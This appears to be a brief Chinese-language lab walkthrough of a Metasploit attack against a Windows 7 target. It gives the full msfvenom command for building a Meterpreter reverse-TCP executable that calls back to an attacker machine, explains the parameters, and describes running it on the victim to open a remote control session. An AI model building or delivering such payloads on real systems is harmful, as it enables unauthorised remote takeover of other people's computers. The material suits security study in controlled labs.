复现环境
1、Windos7(靶机)
2、Kali Linux 2(攻击机)
在Kali Linux上生成被控端
使用msfvenom生成被控程序,输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.128 lport=5000 -f exe -o /kali/home/payload.exe
常用msfvenom参数
-p,指定要生成的payload(攻击荷载)
-f,指定输出格式
-o,指定存储payload的位置
命令中的lhost 为这个被控端要连接到的主机的IP,即攻击机kali,lport是连接到攻击机的哪个端口,-f exe则表示这个生成的被控端是一个exe程序,-o则是表示这个被控端程序存储在/kali/home目录下
在Kali Linux上生成主控端
现在只要有计算机打开了这个被控端程序payload.exe就会连接到Kali上被直接控制
首先,我们要在Kali上启动Metasploit,输入命令msfconsle
成功启动后,在Metasploit中进行一些配置并监听
接着我们把这个payload.exe弄到Windows7(被攻击机)上,打开这个被控端程序即可在Kali上建立会话控制靶机
在终端中最后显示
meterpreter >
即表示已成功控制靶机